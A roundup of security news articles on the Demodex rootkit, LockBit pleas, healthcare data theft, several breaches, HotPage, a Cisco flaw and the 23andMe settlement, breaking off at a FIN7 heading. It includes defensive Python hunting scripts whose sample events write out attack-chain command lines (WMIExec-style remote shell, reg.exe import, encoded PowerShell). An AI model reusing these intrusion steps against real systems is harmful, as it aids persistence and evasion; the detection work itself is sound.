
Chinese-Linked Threat Actor ‘Ghost Emperor’ Returns With Demodex Rootkit

A China-linked hacking group known as Ghost Emperor has resurfaced with an updated version of its sophisticated Demodex rootkit, according to cybersecurity researchers. Ghost Emperor typically targets Southeast Asian telecom and government entities, and has modified its infection chain and added new evasion techniques to its malware arsenal.

New Ghost Emperor Demodex Infection Chain

Ghost Emperor uses multi-stage malware to achieve stealthy execution and persistence, and employs several methods to impede analysis.

Image: Ghost Emperor Demodex rootkit overview (source: sygnia.co)

Researchers from Sygnia found that the updated Demodex infection chain begins with WMIExec, a remote execution tool, being used to run a batch file on the victim's machine. The batch file drops a CAB archive named "1.cab" into C:\Windows\Web, extracts four files from it with expand.exe, and imports two malicious registry files with the "reg.exe import [file]" command. Relying on legitimate Microsoft tools such as reg.exe and expand.exe helps the operation blend in with normal administrative activity.

After the registry keys are imported, the batch file runs an encrypted PowerShell script that creates a new service named "WdiSystem" whose Service DLL is the malicious prints1m.dll. The script also creates a service group called "WdiSystemhost" and runs the malicious service inside it, so that the malware's host process resembles a legitimate Windows system process.

The Service DLL resolves the functions it needs at runtime by walking the Process Environment Block (PEB), an internal OS structure, to reach LoadLibraryA. It then decrypts an embedded configuration containing parameters such as the initial sleep time, the registry paths where the shellcode is stored, and the list of module and function names required for operation.

Sygnia's incident response team uncovered the new variant while investigating a network breach that affected both a client and the client's business partner. The sample, compiled in July 2021, shares similarities with the version analyzed by Kaspersky in 2021 but incorporates several key changes.
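As an added example (not code from the Sygnia report or from this page), the following Python script turns the chain described above into hunting rules and runs them over a small set of constructed Sysmon-style events. Assumptions, not facts from the page: the batch file path, the ADMIN$ output-redirection pattern used to spot WMIExec (modelled on how Impacket's wmiexec.py runs commands), that the four extracted files land in C:\Windows\Web next to the CAB, the placeholder encoded PowerShell payload, and the registry paths, which follow the standard Services\<name>\Parameters\ServiceDll and Control\SvcHost\<group> layout.

```python
"""Hunting rules for the Demodex infection chain, run over constructed sample telemetry."""
import re

# Constructed Sysmon-style events written for this example (EID 1 = process creation,
# EID 13 = registry value set). They are not real logs from the investigation.
SAMPLE_EVENTS = [
    {"eid": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c C:\Windows\Temp\run.bat 1> \\127.0.0.1\ADMIN$\__1721000000.1 2>&1"},
    {"eid": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\expand.exe",
     "cmdline": r"expand.exe -F:* C:\Windows\Web\1.cab C:\Windows\Web"},
    {"eid": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe import C:\Windows\Web\1.reg"},
    {"eid": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe import C:\Windows\Web\2.reg"},
    {"eid": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # Placeholder encoded payload, not the actor's script.
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand JABzAD0ATgBlAHcALQBTAGUAcgB2AGkAYwBlAA=="},
    {"eid": 13, "target": r"HKLM\System\CurrentControlSet\Services\WdiSystem\Parameters\ServiceDll",
     "details": r"C:\Windows\Web\prints1m.dll"},
    {"eid": 13, "target": r"HKLM\System\CurrentControlSet\Control\SvcHost\WdiSystemhost",
     "details": "WdiSystem"},
    # Benign noise that the rules must not flag.
    {"eid": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion"},
    {"eid": 13, "target": r"HKLM\System\CurrentControlSet\Services\Dhcp\Parameters\ServiceDll",
     "details": r"%SystemRoot%\system32\dhcpcore.dll"},
]

WINDOWS_WEB = "c:\\windows\\web"
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")
# -e, -ec, -enc and -EncodedCommand all launch encoded PowerShell.
ENCODED_PS = re.compile(r"(^|\s)-e(c|nc|ncodedcommand)?(\s|$)")


def norm_path(path: str) -> str:
    """Lower-case and expand %SystemRoot% (assumed to be C:\\Windows) so paths compare reliably."""
    return path.strip('"').lower().replace("%systemroot%", "c:\\windows")


def basename(path: str) -> str:
    return norm_path(path).rsplit("\\", 1)[-1]


def process_rules(ev: dict) -> list[str]:
    hits = []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"].lower()
    # WMIExec-style remote shell: cmd.exe spawned by the WMI provider host with output sent to ADMIN$.
    if image == "cmd.exe" and parent == "wmiprvse.exe" and "admin$" in cmd:
        hits.append("wmiexec_remote_shell")
    # CAB extraction into C:\Windows\Web, a directory installers rarely write to.
    if image == "expand.exe" and ".cab" in cmd and WINDOWS_WEB in cmd:
        hits.append("cab_expand_in_windows_web")
    # reg.exe import of a .reg file dropped under C:\Windows\Web.
    if image == "reg.exe" and re.search(r"\bimport\b", cmd) and WINDOWS_WEB in cmd:
        hits.append("reg_import_from_windows_web")
    # Encoded PowerShell launched from a batch file.
    if image == "powershell.exe" and parent == "cmd.exe" and ENCODED_PS.search(cmd):
        hits.append("encoded_powershell_from_batch")
    return hits


def registry_rules(ev: dict) -> list[str]:
    hits = []
    target, details = norm_path(ev["target"]), norm_path(ev["details"])
    # A ServiceDll outside System32/SysWOW64 is unusual for a svchost-hosted service.
    if target.endswith("\\parameters\\servicedll") and not details.startswith(SYSTEM_DIRS):
        hits.append("servicedll_outside_system32")
        if details.startswith(WINDOWS_WEB):
            hits.append("servicedll_in_windows_web")
    # Any write to a svchost group definition: noisy alone, meaningful next to the rules above.
    if "\\control\\svchost\\" in target:
        hits.append("svchost_group_written")
    return hits


CHAIN_RULES = {"wmiexec_remote_shell", "cab_expand_in_windows_web", "reg_import_from_windows_web",
               "encoded_powershell_from_batch", "servicedll_in_windows_web", "svchost_group_written"}


def hunt(events: list[dict]) -> tuple[list[tuple[int, str]], bool]:
    """Return (findings as (event index, rule name), chain_suspected)."""
    findings = []
    for idx, ev in enumerate(events):
        rules = process_rules(ev) if ev["eid"] == 1 else registry_rules(ev)
        findings.extend((idx, rule) for rule in rules)
    distinct = {rule for _, rule in findings}
    # Three or more distinct stages on one host is the correlation threshold used here (a tunable assumption).
    return findings, len(distinct & CHAIN_RULES) >= 3


if __name__ == "__main__":
    found, suspected = hunt(SAMPLE_EVENTS)
    for idx, rule in found:
        print(f"event {idx}: {rule}")
    print("Demodex-style chain suspected:", suspected)
```

The individual rules are deliberately loose (reg.exe import and svchost group writes happen legitimately), so the value is in the correlation step: several stages firing on the same host within a short window, which is what the sample shows while the two benign events produce nothing.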

Enhanced Evasion Techniques

The malware also employs an EDR evasion technique: it sets a process mitigation policy on its own processes that forbids loading DLLs not signed by Microsoft. Because most user-mode hooking relies on injecting a vendor DLL into the target process, this limits what analysis and security tools can observe. The service then reads two encrypted registry keys, decrypts the shellcode they hold, and sets up a reflective loader to execute the core-implant DLL. The researchers note that Ghost Emperor has implemented the following new methods to evade detection:
  • EDR Evasion: The malware sets a process mitigation policy that prevents loading of non-Microsoft signed DLLs, potentially blocking security software from injecting monitoring code.
  • Dynamic Function Loading: The malicious DLL dynamically loads necessary functions, making static analysis more difficult.
  • Encrypted Configuration: Key parameters, including registry paths and required function names, are stored in an encrypted configuration within the DLL.
  • Reflective Loading: A position-independent shellcode acts as a reflective loader for the core implant, which is stored as a corrupted PE file to resist analysis.
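As an added example (not code from the Sygnia report or from this page), this Python script queries each process's binary-signature mitigation policy with GetProcessMitigationPolicy and lists the processes enforcing MicrosoftSignedOnly, the setting described under EDR Evasion above, so they can be compared against a baseline collected from a clean host. The live query needs Windows; the sample results, the baseline and the triage approach are constructed for this example. Which legitimate processes enable the policy varies by build (some browsers and Store apps do), so the baseline is something you gather yourself rather than a fact from the page.

```python
"""List processes enforcing the MicrosoftSignedOnly mitigation and diff them against a clean-host baseline."""
from __future__ import annotations

import ctypes
import sys

# PROCESS_MITIGATION_POLICY enumerator for ProcessSignaturePolicy (processthreadsapi.h).
PROCESS_SIGNATURE_POLICY = 8
# Bit layout of PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY.Flags, lowest bit first.
SIGNATURE_POLICY_BITS = {
    0: "MicrosoftSignedOnly",
    1: "StoreSignedOnly",
    2: "MitigationOptIn",
    3: "AuditMicrosoftSignedOnly",
    4: "AuditStoreSignedOnly",
}
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000


def decode_signature_policy(flags: int) -> dict[str, bool]:
    """Translate the raw Flags DWORD into named booleans."""
    return {name: bool((flags >> bit) & 1) for bit, name in SIGNATURE_POLICY_BITS.items()}


def enumerate_pids() -> list[int]:
    """All PIDs via psapi!EnumProcesses (Windows only)."""
    psapi = ctypes.windll.psapi
    psapi.EnumProcesses.argtypes = [ctypes.POINTER(ctypes.c_uint32), ctypes.c_uint32,
                                    ctypes.POINTER(ctypes.c_uint32)]
    arr = (ctypes.c_uint32 * 8192)()
    needed = ctypes.c_uint32(0)
    if not psapi.EnumProcesses(arr, ctypes.sizeof(arr), ctypes.byref(needed)):
        raise ctypes.WinError()
    return list(arr[: needed.value // ctypes.sizeof(ctypes.c_uint32)])


def query_process(pid: int) -> tuple[str, int] | None:
    """Return (image path, signature policy flags) for pid, or None if it cannot be opened."""
    k32 = ctypes.windll.kernel32
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.GetProcessMitigationPolicy.argtypes = [ctypes.c_void_p, ctypes.c_int,
                                               ctypes.POINTER(ctypes.c_uint32), ctypes.c_size_t]
    k32.QueryFullProcessImageNameW.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.c_wchar_p,
                                               ctypes.POINTER(ctypes.c_uint32)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION, 0, pid)
    if not handle:
        return None  # protected or foreign-session process; not an error for a sweep
    try:
        flags = ctypes.c_uint32(0)
        if not k32.GetProcessMitigationPolicy(handle, PROCESS_SIGNATURE_POLICY,
                                              ctypes.byref(flags), ctypes.sizeof(flags)):
            return None
        buf = ctypes.create_unicode_buffer(1024)
        size = ctypes.c_uint32(len(buf))
        if not k32.QueryFullProcessImageNameW(handle, 0, buf, ctypes.byref(size)):
            return None
        return buf.value, flags.value
    finally:
        k32.CloseHandle(handle)


def scan_signed_only() -> list[tuple[int, str, dict[str, bool]]]:
    """Every process currently enforcing MicrosoftSignedOnly (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live process query requires Windows")
    results = []
    for pid in enumerate_pids():
        info = query_process(pid)
        if info is None:
            continue
        image, flags = info
        policy = decode_signature_policy(flags)
        if policy["MicrosoftSignedOnly"]:
            results.append((pid, image, policy))
    return results


def triage(results, baseline_images):
    """Keep processes whose image was not seen enforcing the policy on a known-clean host.
    The baseline is yours to collect by running scan_signed_only() on a reference build; a
    svchost.exe instance showing up here deserves a look at which service DLL it hosts, since
    Demodex runs as a service DLL rather than as its own executable."""
    base = {img.lower() for img in baseline_images}
    return [(pid, image, policy) for pid, image, policy in results if image.lower() not in base]


# Constructed sample results and baseline, for illustration only.
SAMPLE_RESULTS = [
    (4321, r"C:\Program Files\Browser\browser.exe", decode_signature_policy(0x1)),
    (1188, r"C:\Windows\System32\svchost.exe", decode_signature_policy(0x1)),
]
SAMPLE_BASELINE = [r"C:\Program Files\Browser\browser.exe"]

if __name__ == "__main__":
    live = scan_signed_only() if sys.platform == "win32" else SAMPLE_RESULTS
    for pid, image, policy in triage(live, SAMPLE_BASELINE):
        print(pid, image, [name for name, on in policy.items() if on])
```

Run it elevated so that service processes can be opened; anything it cannot open is skipped rather than reported, so an empty result from a non-admin session proves nothing.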
The researchers have also published a list of indicators of compromise (IOCs) in their report.

Image: Ghost Emperor Demodex infection chain (source: sygnia.co)

Ghost Emperor is the latest of several China-linked APTs to demonstrate advanced techniques and evolved capabilities in their operations, raising concerns among governments, independent researchers and security firms about threats from the region.

Two LockBit Ransomware Affiliates Plead Guilty in U.S. Federal Court

Two foreign nationals from the notorious international ransomware group LockBit have pleaded guilty in federal court in Newark to participating in the group and deploying attacks against victims in the United States and worldwide. Ruslan Magomedovich Astamirov, 21, a Russian national, and Mikhail Vasiliev, 34, a dual Canadian-Russian citizen, admitted their involvement. Between 2020 and 2024, LockBit attacked more than 2,500 victims in at least 120 countries, 1,800 of them in the United States, extorting hundreds of millions of dollars in ransom payments.

Scope of LockBit's Operations

The guilty pleas follow a recent disruption of LockBit ransomware in February, in which the UK National Crime Agency's Cyber Division, working with the Justice Department, FBI, and other international law enforcement partners, seized public-facing websites and control of servers used by LockBit administrators, disrupting the group's ability to attack and encrypt networks. The disruption diminished LockBit's reputation and ability to attack further victims. The case also involves charges brought against other LockBit members, including its alleged creator, developer, and administrator, Dmitry Yuryevich Khoroshev, who is currently the subject of a reward of up to $10 million through the U.S. Department of State's Transnational Organized Crime Rewards Program. Khoroshev is accused of recruiting new affiliate members, acting as the representative for the group, and developing and maintaining the infrastructure used by affiliates to deploy LockBit attacks. U.S. Attorney Philip R. Sellinger emphasized the commitment to holding cybercriminals accountable, stating:
“Astamirov and Vasiliev thought that they could deploy LockBit from the shadows, wreaking havoc and pocketing massive ransom payments from their victims, without consequence. They were wrong. We, in New Jersey, along with our domestic and international law enforcement partners will do everything in our power to hold LockBit’s members and other cybercriminals accountable, disrupt and dismantle their operations, and put a spotlight on them as wanted criminals – no matter where they hide."

Impact of the Guilty LockBit Pleas

Astamirov, who operated under aliases such as "BETTERPAY" and "Eastfarmer," deployed LockBit against at least 12 victims between 2020 and 2023, extorting approximately $1.9 million in ransom payments. As part of his plea agreement he agreed to forfeit $350,000 in seized cryptocurrency. Vasiliev, known online as "Ghostrider" and "Free," among other aliases, targeted at least 12 victims between 2021 and 2023, causing at least $500,000 in damages and losses.

LockBit Victim Assistance

LockBit victims are encouraged to contact the FBI and submit information at https://lockbitvictims.ic3.gov. Law enforcement has developed decryption capabilities that may enable hundreds of victims around the world to restore systems encrypted using the LockBit ransomware variant. Victims are also encouraged to visit https://www.justice.gov/usao-nj/lockbit for case updates and information regarding their rights under U.S. law, including the right to submit victim impact statements and request restitution.

Securing Healthcare Data: Dark Web Monitoring Insights for CISOs

In today's digital age, healthcare data has become a prime target for cybercriminals. With a single health record fetching up to $1,000 on the dark web, Chief Information Security Officers (CISOs) in the healthcare sector face unprecedented challenges. Healthcare data's comprehensive nature makes it a high-value commodity on the dark web, attracting cybercriminals seeking to exploit outdated IT systems and ransomware vulnerabilities. With the help of Cyble's skilled threat intelligence researchers, we offer dark web monitoring insights for CISOs, delving into the dark web's lure for healthcare data, the risks presented by healthcare data breaches, and the essential steps CISOs must take to secure sensitive information.

Dark Web's Allure for Healthcare Data

The dark web, the part of the web that is not indexed by search engines and is typically reached through specialized browsers such as Tor, has become a hub for cybercriminal activity. Its anonymity provides a safe haven for illegal activities and an ideal setting for the sale of stolen healthcare data. A single health record can fetch as much as $1,000, more than a credit card or Social Security number. In an article on its website, the American Hospital Association Center for Health Innovation cites data from an IBM Security study:
In fact, stolen health records may sell up to 10 times or more than stolen credit card numbers on the dark web. Unfortunately, the bad news does not stop there for health care organizations — the cost to remediate a breach in health care is almost three times that of other industries — averaging $408 per stolen health care record versus $148 per stolen non-health record.
Image: Post on BreachForums alleging breach of HealthCare.gov

According to Cyble Research and Intelligence Labs (CRIL), outdated IT infrastructure and operating systems at many healthcare organizations leave them vulnerable to cyberattacks, and the COVID-19 pandemic has exacerbated these risks by necessitating remote work and opening new security gaps. Cybercriminals have developed a sophisticated multi-tiered business model for stolen healthcare data that makes it difficult for law enforcement to trace the source. Illegally obtained data is commoditized and sold, with prices varying by its potential value to the buyer, and is often combined with other information to build complete patient profiles that are then sold for a range of fraudulent activities. The comprehensive nature of healthcare records and their richness in personal information make them a goldmine for identity theft and insurance fraud, and a threat that healthcare CISOs need to stay on top of.

Ransomware Disruptions to Healthcare

Ransomware attacks have become a profitable venture for cybercriminals, with healthcare organizations prime targets due to the critical nature of their services and the high value of patient data. These disruptions can lead to compromised patient care, increased mortality rates, and severe financial and operational consequences.

Image: Emerging threats to the U.S. healthcare sector in 2024 (source: Cyble Threat Landscape Report 2024)

According to data from the Office of the Director of National Intelligence (ODNI), ransomware attacks on healthcare providers have surged, increasing 128 percent in the U.S. alone, from 113 victims in 2022 to 258 in 2023. The study found that LockBit and ALPHV/BlackCat were the two most "popular RaaS providers" and were responsible for more than 30 percent of all reported healthcare attacks worldwide.

Image: Ransomware attacks on healthcare providers (source: dni.gov)

These attacks not only disrupt services but also lead to longer patient stays, delayed medical procedures and, in some cases, higher mortality rates, as well as substantial financial costs, potential HIPAA violations and reputational damage to the institution. The data stolen in these attacks often ends up for sale on the dark web. The ODNI study stated, "US hospitals have delayed medical procedures, disrupted patient care because of multi-week outages, diverted patients to other facilities, rescheduled medical appointments, and strained acute care provisioning and capacity as a result of ransomware attacks."

Image: Emerging threats to the U.S. healthcare sector in 2024 (source: Cyble Threat Landscape Report)

Cybercriminals employ various tactics in healthcare ransomware attacks, including:
  • Phishing emails with malicious links
  • Complex attacks designed to maximize damage
  • Encrypting personal health information (PHI)
  • Exploiting vulnerabilities in medical devices

Protecting the Healthcare Sector

As healthcare data becomes increasingly valuable on the dark web, CISOs must remain vigilant and proactive. By implementing robust security measures, educating staff, and empowering patients, healthcare organizations can better protect sensitive information from cyber threats.
  • Educating healthcare staff on data handling: The persistent targeting of the healthcare industry highlights the need for cybersecurity training. Staff must be taught to identify phishing attempts, use secure authentication practices such as MFA, comply with HIPAA and other laws, and follow mobile and other device security policies. A visible and accessible security team, supported by proactive leadership, can foster a culture in which security is everyone's responsibility.
  • Patient involvement in protecting healthcare data: Patients also have a role to play. They should review their health records, use secure healthcare channels, and report any suspicious activity to their providers.
  • Monitoring the dark web: Tools such as Cyble's dark web monitoring solution offer early breach detection and AI-powered threat tagging, enabling CISOs to identify threats and breaches earlier and to contain them faster.
  • Comprehensive logging of healthcare systems: Thorough logging helps CISOs and security staff track and analyze potential security incidents.
  • Strong access controls: Role-based access control (RBAC), multi-factor authentication and the principle of least privilege on critical healthcare systems help keep attackers away from sensitive data. Regularly reviewing and updating access controls keeps them aligned with changing security requirements.
  • Data encryption: Encrypting sensitive healthcare data in transit and at rest with industry-standard protocols and algorithms (for example TLS for data in transit and AES for data at rest) protects it from unwanted access.
  • Secure mobile devices: A mobile device security policy should cover device configuration, password management and data encryption for mobile devices used in the healthcare environment, and should be enforced.
  • Network segmentation: Segmenting the network isolates critical healthcare systems and reduces the attack surface.
  • Keep software, firmware and applications updated: A regular update schedule for software, firmware and applications used in healthcare systems helps keep threat actors out. Automated update mechanisms, where possible, minimize downtime and ensure timely patching of vulnerabilities.

Monitoring the Dark Web for Healthcare Data

Healthcare CISOs can do a lot to protect patient data and keep it off the dark web by isolating and securing critical systems and encrypting data. But in the event that some data does leak out, dark web monitoring solutions are your best bet for an early warning.

Pueblo County School District 70 Confirms Data Breach; CIA Involved in Investigation

Pueblo County School District 70 is taking steps to address a recent data breach and ransomware attack that may have compromised the personal information of former students of the Colorado school district, as well as current and former staff. The data compromised in the breach is believed to date from between 1991 and 2006, and is said to include student and staff records from an undetermined period. Superintendent Ronda Rein acknowledged the delay in publicly disclosing the incident and confirmed the involvement of federal agencies in the investigation.

Pueblo County School District 70 Data Breach Response

According to one report, the district was notified of the ransomware attack by Sophos on April 27, and a data breach was confirmed by the CIA on May 15. IT technicians and agents from several organizations, including Pueblo School District 60, Colorado State University Pueblo, the CIA and the FBI, assisted in identifying the affected data. According to Superintendent Ronda Rein, the district was not allowed to release information immediately because of the CIA's involvement in the investigation. It is not clear why the CIA was involved.

Image: Pueblo County School District 70 data breach notice (source: district70.org)

Rein emphasized that the district has taken measures to strengthen its systems and protect personal information. These include implementing two-step authentication on staff accounts, moving critical information from local servers to cloud-based servers, and hiring a full-time staff member responsible for cybersecurity. The district has also limited access to district resources to U.S.-based requests and narrowed firewall and VPN access to administrative staff only.

Advice for Affected Individuals

In its data breach notice, Pueblo County School District 70 advised students, staff, alumni and community members to monitor their credit reports and financial statements, consider restricting access to their credit reports, consider placing a fraud alert, and be wary of suspicious communications. Those seeking additional assistance can contact the district's IT support team at 719-549-6121. By taking active measures to strengthen its systems and inform affected individuals, the district hopes to support its community through any fallout from the incident. "We take the privacy and security of our community's information extremely seriously," Superintendent Rein stated. "We are working diligently with cybersecurity experts to fully understand the scope of this incident and to strengthen our systems against future threats." The notice also pointed to identity theft protection resources available through Equifax, Experian, LifeLock and TransUnion, noting that contact information for those organizations was available on the district's website. "We apologize for any concern or inconvenience this may cause and are committed to supporting our community through this process," the notice read.

Researchers Discover Intrusive ‘HotPage’ Malware with Microsoft-Signed Driver

Researchers have observed a seemingly innocuous software installer named HotPage.exe deploying a Microsoft-signed driver capable of injecting code into other processes on the system and intercepting browser traffic. Although initially classified as adware, its ability to modify web content and redirect users raised red flags among security researchers. The driver, signed by Microsoft, was developed by an obscure Chinese company, Hubei Dunwang Network Technology Co., Ltd.

Intrusive Nature of HotPage

Advertised to Chinese-speaking users, the software claims to improve web browsing by blocking ads and malicious sites. In reality, HotPage uses those functions to display game-related ads and collect system information. According to ESET researchers, the malware's core is the Microsoft-signed driver, which performs code injection into processes running on the infected system. Alongside this, the malware installs two libraries that intercept and manipulate browser network traffic, allowing it to modify web page content, redirect users, or open new tabs when predetermined conditions are met. The kernel-level access granted by the driver also opens a path for deploying additional payloads: because of improper access restrictions on the driver, threat actors could potentially use it to execute code with the highest available privileges on the Windows system. The Microsoft Security Response Center (MSRC) was notified on March 18, 2024, and by May 1, 2024 the driver had been removed from the Windows Server Catalog. ESET detects the threats as Win{32|64}/HotPage.A and Win{32|64}/HotPage.B.

Image: HotPage driver listing (source: welivesecurity.com)

The Company Behind the Malware

The malware's developers had obtained an Extended Validation (EV) code-signing certificate, which Microsoft requires before a company can submit drivers for signing through its hardware program; that is how the HotPage driver came to carry a Microsoft signature. The company, Hubei Dunwang Network Technology Co., Ltd., was established in January 2022 and is now owned by Wuhan Yishun Baishun Culture Media Co., Ltd., a small advertising firm. Despite claiming to offer a security product, the company's software appears to contradict its own license agreement: while the company stated that DwAdsafe had no interception capabilities, the software includes intrusive monitoring and filtering functions.

Image: Web-crawled screenshot of dwadsafe.com before shutdown (source: welivesecurity.com)

The company's website, dwadsafe[.]com, is no longer accessible, but archived versions describe the product as an "Internet cafe active defense cloud platform." While masquerading as a helpful tool, HotPage poses significant risks to user privacy and system security. Its signed driver and deceptive marketing illustrate a troubling trend of malware presented as legitimate software with well-intentioned purposes, and the campaign underscores the need for thorough vetting in driver-signing processes as threat actors seek to exploit trust in legitimate software channels.

Cisco SSM On-Prem Addresses Critical Vulnerability That Allowed Attackers to Change User Passwords

Cisco has issued a critical security advisory for a vulnerability in its Cisco Smart Software Manager On-Prem licensing tool that could allow attackers to change any user's password on a license server, including administrator passwords. The flaw, tracked as CVE-2024-20419, affects SSM On-Prem, including releases earlier than Release 7.0, which were known as Cisco Smart Software Manager Satellite (SSM Satellite).

Cisco Smart Software Manager On-Prem Vulnerability

The vulnerability carries the maximum CVSS score of 10.0 and stems from an improper implementation of the password-change process in SSM On-Prem's authentication system.

Image: Cisco advisory for the password-change vulnerability (source: sec.cloudapps.cisco.com)

The National Vulnerability Database describes the vulnerability as follows:
"A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device."
As a Cisco Smart Licensing component, SSM On-Prem plays a central role in managing customer accounts and product licenses for service providers and Cisco partners. An attacker who exploits the flaw by sending crafted HTTP requests to an affected device can then access the web UI or API with all the privileges of the compromised user account.

SSM On-Prem Disclosure and Official Patch

Cisco acknowledged the disclosure and thanked Mohammed Adel, the researcher who reported the vulnerability. Cisco has released software updates to address it and stated that there are no workarounds. Customers with active service contracts should obtain the fixes through their regular update channels; those without service contracts can contact the Cisco Technical Assistance Center (TAC) to obtain the required upgrades. Cisco's Product Security Incident Response Team (PSIRT) has not found evidence of public proof-of-concept (PoC) exploits or active exploitation of this vulnerability, but the company urges customers to remain vigilant and to consult Cisco security advisories regularly for the latest threats and mitigations.

Image: Cisco advisory for CVE-2024-20419 (source: sec.cloudapps.cisco.com)

The advisory lists the affected and fixed releases, and customers are strongly encouraged to upgrade to the appropriate fixed release to secure their SSM On-Prem installations. Before upgrading, confirm that the device has sufficient memory and that the current hardware and software configuration remains supported by the new release. Customers are also advised to consult the advisories for their Cisco products regularly to determine exposure and a complete upgrade path; the Cisco Support and Downloads page on Cisco.com provides licensing and download information.

Japanese Real Estate Firm SUUMO Confirms Data Breach Incident

Recruit Co., Ltd., a prominent Tokyo-based company, recently announced that a data breach had affected its real estate arm SUUMO and compromised sensitive data belonging to some of its employees. The incident, discovered on July 9, involved unauthorized access to a server used to test one of its real estate services. The company says no user or customer information was compromised and no secondary damage has been reported; however, the breach exposed personal data records of 1,313 current and former employees going back as far as 2007. The firm has also come under increased scrutiny recently over its handling of student data and its outsourcing to foreign countries.

Recruit Co Ltd Response and Preventive Measures

On July 9, SUUMO, the real estate arm of Recruit, detected unauthorized third-party access to the server of a service provided to real estate companies, which was being tested ahead of deployment in some areas.

Image: SUUMO data breach notice (source: suumo.jp)

The affected system was shut down, but some employee data on it was found to have been compromised. Recruit expressed regret for the inconvenience and concern caused by the incident, and took several actions to limit its impact, including:
  • Contacting affected employees individually
  • Setting up a hotline for inquiries
  • Implementing measures against unauthorized access
  • Rebuilding and re-inspecting affected servers
  • Strengthening overall security measures
The statement, issued from the head office in Chiyoda-ku, Tokyo by President and CEO Yoshihiro Kitamura, said that data relating to 1,313 employees and contractors involved in the development and maintenance of its housing-related services since 2007 had been affected. "We would like to report the following and offer our deepest apologies for the considerable inconvenience and concern caused to all concerned parties," the statement said. "In addition, no leaks of user or customer information have been confirmed in this incident. As of today, no secondary damage caused by the use of employee information has been confirmed," it added.

Concerns Over Student Data Management and Outsourcing

In a separate recent development, Recruit Co. came under intense scrutiny for its handling of public school students' personal data. The company had been authorized by some local governments to collect and manage student information in order to provide various educational apps, but other local governments reported that they had not been fully aware of its data collection practices. Concerns grew when it came to light that Recruit had allegedly shared some of this data with foreign businesses to improve other commercial apps. A Yomiuri Shimbun survey found that at least 14 local governments introduced Recruit's apps this fiscal year and that about 85,000 elementary and junior high school students use them; some of those local governments were unaware of the overseas outsourcing and other improper handling of students' personal data. The education ministry announced plans to investigate the situation nationwide, suspecting mismanagement of student data by local governments and the firm. It emphasized that local governments must take proper initiative in collecting and managing student data, supervise app providers, and exercise caution when storing data overseas.

23andMe Reaches Settlement in Data Breach Class Actions Lawsuit

Genetic testing company 23andMe has reached a settlement in principle for class actions stemming from a 2023 data breach, lawyers announced during a San Francisco court hearing on Tuesday. The breach compromised the personal information of nearly 7 million users, including sensitive genetic profiles. While the settlement details remain undisclosed, U.S. District Judge Edward Chen of the Northern District of California scheduled a July 30 hearing to review the status of the term sheet. A motion for preliminary approval is expected within 30 to 45 days.

23andMe Settlement Negotiations and Terms

Image: 23andMe statement on the settlement (source: blog.23andme.com)

Co-lead plaintiffs' counsel Cari Laufenberg of Keller Rohrback told Judge Chen that the parties accepted a proposal from mediator Randall Wulff following a June 26 meeting. The agreement in principle follows a relatively swift resolution process, although plaintiffs' lawyers had disagreed during early settlement talks. In January, some plaintiffs' counsel met with 23andMe representatives to discuss settlement, but disagreements over the best approach for breach victims led to a fight over leadership of the cases; Judge Chen intervened last month and appointed co-lead counsel to oversee them. At a hearing last month, lawyers voiced concerns that 23andMe was in imminent danger of filing for bankruptcy, suggesting that injunctive relief, including a fund to compensate class members for psychological or physical harm, would be a key focus of any settlement. The settlement is expected to encompass the multidistrict litigation, the state court cases, and thousands of arbitration demands. While specific terms are not yet public, earlier discussions pointed to a potential "steep discount" in monetary relief for class members in a case that faced up to $3 billion in damages under the Illinois Genetic Information Privacy Act. The terms may include injunctive relief (a court order requiring 23andMe to act in a certain way) and options such as dark web monitoring for victims.

Financial Implications and Company Response

[Image: 23andMe reaches settlement in data breach. Source: 23andme.com] 23andMe's annual report revealed $216 million in cash, which could affect the settlement amount. The company's attorney, Ian Ballon of Greenberg Traurig, said the focus moving forward is on settlement and approval. A 23andMe spokesperson stated that the agreement is "in the best interest of 23andMe customers," and that the company looks forward to finalizing the settlement. This resolution comes as a relief to the company, which faced potential bankruptcy concerns raised by lawyers during previous hearings. The settlement marks a significant step in addressing the fallout from the data breach, relieving some fears that had been stoked earlier after the genetic information of specific ethnic groups had been compromised. One such data set had been advertised on a hacking forum as a list of Ashkenazi Jews, while another had been described as a list of people of Chinese descent. As the case progresses, the final terms of the settlement will provide insight into how 23andMe plans to compensate affected users and improve its data security measures.

FIN7 Cybercriminal Gang Adopts Techniques to Elude EDR and Automate Attacks

FIN7, a financially motivated threat actor group with origins in Russia, has shown a persistent determination to evolve and adapt its tactics despite setbacks and arrests, utilizing multiple pseudonyms to mask its true identity and sustain its criminal operations. The group, which has been active since 2012, initially focused on point-of-sale malware for financial fraud, but shifted to ransomware operations in 2020, affiliating with well-known ransomware-as-a-service groups and launching its own independent programs.

FIN7 Underground Operations

